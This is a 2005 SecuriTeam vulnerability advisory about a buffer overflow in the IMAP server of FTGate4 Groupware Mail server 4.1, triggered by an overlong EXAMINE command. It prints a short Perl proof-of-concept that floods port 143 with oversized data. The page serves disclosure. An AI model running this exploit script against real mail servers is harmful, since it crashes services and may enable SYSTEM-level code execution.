Security News -  Security Reviews -   Exploits -  Tools -  UNIX Focus -  Windows Focus
SecuriTeam  Beyond Security  SecuriTeam Home  Ask the Team  Mailing Lists  Advertising Info  Blogs  Black Box Testing  Vulnerability Assessment  Vulnerability Scanner SecuriTeam in Your Inbox   E-mail this article to a friend New vulnerability? New tool? Tell us	FTGate4 Groupware Mail server Buffer Overflow (Exploit) 17 Nov. 2005    Summary FTGate4 is a powerful Windows(TM) communication suite that combines exceptional mail handling facilities with comprehensive Groupware functionality. FTGate4 contains a security flaw in the IMAP server caused due to boundary errors in the handling of various commands (like EXAMINE).   Credit: The information has been provided by Luca Ercoli. The original articles can be found at:   http://www.lucaercoli.it/advs/FTGate4.txt   http://www.lucaercoli.it/exploits/FTGate-expl.pl    Details Protect your website! Use an External Vulnerability Scanner! Nothing to install. First report in 1 hour! www.beyondsecurity.com/vulnerability-scanner Vulnerable Systems:  * FTGate4 Groupware Mail server version 4.1 An attacker could exploit the vulnerability by sending a malformed request to the IMAP server running on port 143, resulting in a Denial of Service condition and potentially arbitrary code execution with the privileges of the SYSTEM user. Proof of concept: #!/usr/bin/perl use IO::Socket; print "\nFTGate Imapd BufferOverrun\nLuca Ercoli io\@lucaercoli.it\n"; print "http://www.lucaercoli.it\n\n\n"; $host = "localhost"; $remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host, PeerPort => "143", ); unless ($remote) { die "Can't connect to $host" } print "[!] Connected\n"; print "[?] Exploiting...\n"; sleep(1); my $imapd = join ("", "1 login user pass", "\r\n"); print $remote $imapd; sleep(1); my $imapd = join ("", "1 EXAMINE ", "B"x(224), "\r\n"); print $remote $imapd; sleep(1); my $imapd = join ("","C"x(11305), "\r\n"); print $remote $imapd; print "\n[!] Done\n\n\n"; close $remote;  Comments:  Add new comment:  Subject:  Name/Nick/Email:          Chars Left:	All Sections Security News Unix focus Exploits Tools Windows focus Security Reviews  Related Articles Trend Micro HouseCall "notifyOnLoadNative()" Vulnerability Citrix Broadcast Server login.asp SQL Injection Trend Micro HouseCall ActiveX Control Arbitrary Code Execution PGP Desktop PGPwded.sys Denial of Service Microsoft Hierarchical FlexGrid Control Integer Overflows (MS08-070) Microsoft Word Malformed FIB Arbitrary Free Vulnerability (MS08-072) CA ARCserve Backup LDBserver Vulnerability CA ARCserve Backup RPC "handle_t" Argument Vulnerability Internet Explorer 8.0 Beta 2 Anti-XSS Filter Vulnerabilities Microsoft Internet Explorer HTML Tag Long File Name Extension Stack Buffer Overflow Vulnerability (MS08-073) Microsoft Windows Graphics Device Interface Integer Overflow Vulnerability (MS08-071) Microsoft Excel Malformed Object Memoy Corruption Vulnerability (MS08-074) Google Chrome MetaCharacter URI Obfuscation Vulnerability iPhone Configuration Web Utility for Windows Directory Traversal Microsoft Windows Active Directory LDAP Server Information Disclosure Vulnerability  Featured Articles Roundcubemail PHP Arbitrary Code Injection Qemu and KVM VNC Server Remote DoS Sun Solaris SIOCGTUNPARAM IOCTL Kernel NULL Pointer Dereference Firefox Cross-Domain Text Theft Microsoft Word Malformed FIB Arbitrary Free Vulnerability (MS08-072) Internet Explorer 8.0 Beta 2 Anti-XSS Filter Vulnerabilities Hacking SOHO Routers
	Security News - Security Reviews - Exploits - Tools - UNIX Focus - Windows Focus - Blogs - CVEs

Copyright © 1998-2008 Beyond Security® All rights reserved.
Terms of Use Site Privacy Statement.
SecuriTeam™ is a trademark of Beyond Security®